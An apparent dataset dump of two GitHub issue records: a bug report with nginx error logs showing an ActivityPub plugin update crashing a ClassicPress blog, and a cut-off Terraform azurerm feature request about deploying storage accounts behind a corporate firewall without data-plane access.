HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de", referrer: "https://blog.atari-frosch.de/wp-cron.php?doing_wp_cron=1694617419.0634241104125976562500" 2023/09/13 17:03:39 [error] 17262#17262: *695101 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 35.159.31.152, server: blog.atari-frosch.de, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:03:41 [error] 17262#17262: *695115 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 116.203.72.98, server: blog.atari-frosch.de, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:03:43 [error] 17262#17262: *695121 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 152.228.220.143, server: blog.atari-frosch.de, request: "GET /tag/terrorismus/feed/ HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:04:50 [error] 17262#17262: *695134 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-cron.php(34): require_once('/srv/atarifrosc...') #9 {main} thrown in /srv/atarifrosch-blo" while reading response header from upstream, client: 2a01:4f8:150:81e4::2, server: blog.atari-frosch.de, request: "POST /wp-cron.php?doing_wp_cron=1694617490.5343809127807617187500 HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de", referrer: "https://blog.atari-frosch.de/wp-cron.php?doing_wp_cron=1694617490.5343809127807617187500" 2023/09/13 17:04:50 [error] 17262#17262: *695132 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 92.247.181.9, server: blog.atari-frosch.de, request: "GET /feed/ HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de", referrer: "https://blog.atari-frosch.de/" 2023/09/13 17:04:50 [error] 17262#17262: *695137 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_bloc ks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 152.228.220.143, server: blog. atari-frosch.de, request: "GET /2011/05/02/merkel-lobt-obama-fuer-einen-mord/feed/ HTTP/1.1", upstream: "fastcgi://unix: /run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:05:10 [error] 17262#17262: *695141 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 195.62.45.130, server: blog.atari-frosch.de, request: "GET /feed/ HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:05:24 [error] 17262#17262: *695150 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 195.62.45.130, server: blog.atari-frosch.de, request: "GET /feed/ HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:05:42 [error] 17262#17262: *695156 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 185.220.102.241, server: blog.atari-frosch.de, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" Before the upgrade the plugin didn't work. I could never find my instance in the Fediverse.
non_priority
plugin breaks classicpress yesterday i upgraded the plugin in my classicpress installation on blog atari frosch de and directly afterwards the blog only delivered empty pages i had to delete the plugin on the shell i m hosting the stuff myself so that the blog could start working correctly again system devuan gnu linux chimaera kernel linux seelilie smp debian gnu linux webserver nginx full all deb php php with fpm deb this is what the error log said after the update is the server s address fastcgi sent in stderr primary script unknown while reading response header from upstream client server blog atari frosch de request get status php http upstream fastcgi unix run php fpm sock host blog atari frosch de fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp cron php require once srv atarifrosc main thrown in srv atarifrosch blo while reading response header from upstream client server blog atari frosch de request post wp cron php doing wp cron http upstream fas tcgi unix run php fpm sock host blog atari frosch de referrer fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp admin admin ajax php require once srv atarifrosc main thrown in srv ata while reading response header from upstream client server blog atari frosch de request get wp admin admin ajax php action wordfence doscan isfork scanmode quick cronkey signature remote http upstream fastcgi unix run php fpm sock host blog atari frosch de fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp admin admin ajax php require once srv atarifrosc main thrown in srv ata while reading response header from upstream client server blog atari frosch de request get wp admin admin ajax php action wordfence doscan isfork scanmode quick cronkey signature remote http upstream fastcgi unix run php fpm sock host blog atari frosch de fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp admin admin ajax php require once srv atarifrosc main thrown in srv ata while reading response header from upstream client server blog atari frosch de request post wp admin admin ajax php http upstream fastcgi unix run php fpm sock host blog ata ri frosch de referrer fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp admin admin php require once srv atarifrosc srv atarifrosch blog wp admin p while reading response header from upstream client server blog atari frosch de request get wp admin plugins php http upstream fastcgi unix run php fpm sock host blog atari frosch de referrer fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp blog header php require once srv atarifrosc srv atarifrosch blog index php while reading response header from upstream client server blog atari frosch de request get http upstream fastcgi unix run php fpm sock host blog atari frosch de fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp cron php require once srv atarifrosc main thrown in srv atarifrosch blo while reading response header from upstream client server blog atari frosch de request post wp cron php doing wp cron http upstream fastcgi unix run php fpm sock host blog atari frosch de referrer fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp blog header php require once srv atarifrosc srv atarifrosch blog index php while reading response header from upstream client server blog atari frosch de request get http upstream fastcgi unix run php fpm sock host blog atari frosch de fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp cron php require once srv atarifrosc main thrown in srv atarifrosch blo while reading response header from upstream client server blog atari frosch de request post wp cron php doing wp cron http upstream fastcgi unix run php fpm sock host blog atari frosch de referrer fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp blog header php require once srv atarifrosc srv atarifrosch blog index php while reading response header from upstream client server blog atari frosch de request get http upstream fastcgi unix run php fpm sock host blog atari frosch de fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp blog header php require once srv atarifrosc srv atarifrosch blog index php while reading response header from upstream client server blog atari frosch de request get http upstream fastcgi unix run php fpm sock host blog atari frosch de fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp blog header php require once srv atarifrosc srv atarifrosch blog index php while reading response header from upstream client server blog atari frosch de request get tag terrorismus feed http upstream fastcgi unix run php fpm sock host blog atari frosch de fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp cron php require once srv atarifrosc main thrown in srv atarifrosch blo while reading response header from upstream client server blog atari frosch de request post wp cron php doing wp cron http upstream fastcgi unix run php fpm sock host blog atari frosch de referrer fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp blog header php require once srv atarifrosc srv atarifrosch blog index php while reading response header from upstream client server blog atari frosch de request get feed http upstream fastcgi unix run php fpm sock host blog atari frosch de referrer fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register bloc ks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp blog header php require once srv atarifrosc srv atarifrosch blog index php while reading response header from upstream client server blog atari frosch de request get merkel lobt obama fuer einen mord feed http upstream fastcgi unix run php fpm sock host blog atari frosch de fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp blog header php require once srv atarifrosc srv atarifrosch blog index php while reading response header from upstream client server blog atari frosch de request get feed http upstream fastcgi unix run php fpm sock host blog atari frosch de fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp blog header php require once srv atarifrosc srv atarifrosch blog index php while reading response header from upstream client server blog atari frosch de request get feed http upstream fastcgi unix run php fpm sock host blog atari frosch de fastcgi sent in stderr php message php fatal error uncaught error call to undefined function register block type from metadata in srv atarifrosch blog wp content plugins activitypub includes class blocks php stack trace srv atarifrosch blog wp content plugins activitypub includes class blocks php activitypub blocks register blocks srv atarifrosch blog wp content plugins activitypub activitypub php activitypub blocks init srv atarifrosch blog wp includes class wp hook php activitypub init srv atarifrosch blog wp includes class wp hook php wp hook apply filters srv atarifrosch blog wp includes plugin php wp hook do action srv atarifrosch blog wp settings php do action srv atarifrosch blog wp config php require once srv atarifrosc srv atarifrosch blog wp load php require once srv atarifrosc srv atarifrosch blog wp blog header php require once srv atarifrosc srv atarifrosch blog index php while reading response header from upstream client server blog atari frosch de request get http upstream fastcgi unix run php fpm sock host blog atari frosch de before the upgrade the plugin didn t work i could never find my instance in the fediverse
0
51,529
21,705,601,917
IssuesEvent
2022-05-10 09:18:53
hashicorp/terraform-provider-azurerm
https://api.github.com/repos/hashicorp/terraform-provider-azurerm
closed
Support for azurerm_storage_account not to access data-plane
duplicate question service/storage
### Is there an existing issue for this? - [X] I have searched the existing issues ### Community Note <!--- Please keep this note for the community ---> * Please vote on this issue by adding a :thumbsup: [reaction](https://blog.github.com/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/) to the original issue to help the community and maintainers prioritize this request * Please do not leave "+1" or "me too" comments, they generate extra noise for issue followers and do not help prioritize the request * If you are interested in working on this issue or have submitted a pull request, please leave a comment <!--- Thank you for keeping this note for the community ---> ### Description **Background** When deploying a Storage Account from an agent that is behind a corporate firewall that is prohibited access to `*.blob.core.windows.net` and `*.queue.core.windows.net`, the deployment will fail. After taking 5 minutes trying to connect to mystorage.queue.core.windows.net the deployment fails with error: `Error: reading queue properties for AzureRM Storage Account "mystorage": queues.Client#GetServiceProperties: Failure sending request: StatusCode=0 -- Original Error: context deadline exceeded` This is initiated by #16240, and related to #2977 and #9314, but different as it's about a corporate firewall. When this firewall is temporarily allowed access to `*.blob.core.windows.net` and `*.queue.core.windows.net`, it can continue to deploy the Storage Account, next it can deploy a Private Endpoint, and after a sleep of 2 minutes (yes, ugly hack) it can create containers. But as many large corporate enterprises, the security team has established it's a data-exfiltration risk to allow access to `*.blob.core.windows.net` and `*.queue.core.windows.net`, and therefor the corporate firewall will block access. This request is from a large Dutch enterprise building semiconductor machines. **Request** Add an option to not-access the data-plane (to fetch the queue properties). Perhaps because of this the functionality of azurerm_storage_account will be slightly limited, but at least it's possible to deploy and update a Storage Account using the control-plane from behind a corporate firewall. Perhaps this can be done by specifying an additional property on the azurerm_storage_account resource like `do_not_access_data_plane`, or by setting a flag in the `azurerm` provider features section. Optional we could try to make this change ourselves, but would love to get advice upfront. We're not skilled enough yet, but we can give it a try. ### New or Affected Resource(s)/Data Source(s) azurerm_storage_account ### Potential Terraform Configuration ```hcl resource "azurerm_storage_account" "this" { name = "mystorage" resource_group_name = "my-resource-group" location = "westeurope" do_not_access_data_plane = true } or provider "azurerm" { features { storage_account { do_not_access_data_plane = true } } } ``` ### References #2977 #9314 #16240
1.0
Support for azurerm_storage_account not to access data-plane - ### Is there an existing issue for this? - [X] I have searched the existing issues ### Community Note <!--- Please keep this note for the community ---> * Please vote on this issue by adding a :thumbsup: [reaction](https://blog.github.com/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/) to the original issue to help the community and maintainers prioritize this request * Please do not leave "+1" or "me too" comments, they generate extra noise for issue followers and do not help prioritize the request * If you are interested in working on this issue or have submitted a pull request, please leave a comment <!--- Thank you for keeping this note for the community ---> ### Description **Background** When deploying a Storage Account from an agent that is behind a corporate firewall that is prohibited access to `*.blob.core.windows.net` and `*.queue.core.windows.net`, the deployment will fail. After taking 5 minutes trying to connect to mystorage.queue.core.windows.net the deployment fails with error: `Error: reading queue properties for AzureRM Storage Account "mystorage": queues.Client#GetServiceProperties: Failure sending request: StatusCode=0 -- Original Error: context deadline exceeded` This is initiated by #16240, and related to #2977 and #9314, but different as it's about a corporate firewall. When this firewall is temporarily allowed access to `*.blob.core.windows.net` and `*.queue.core.windows.net`, it can continue to deploy the Storage Account, next it can deploy a Private Endpoint, and after a sleep of 2 minutes (yes, ugly hack) it can create containers. But as many large corporate enterprises, the security team has established 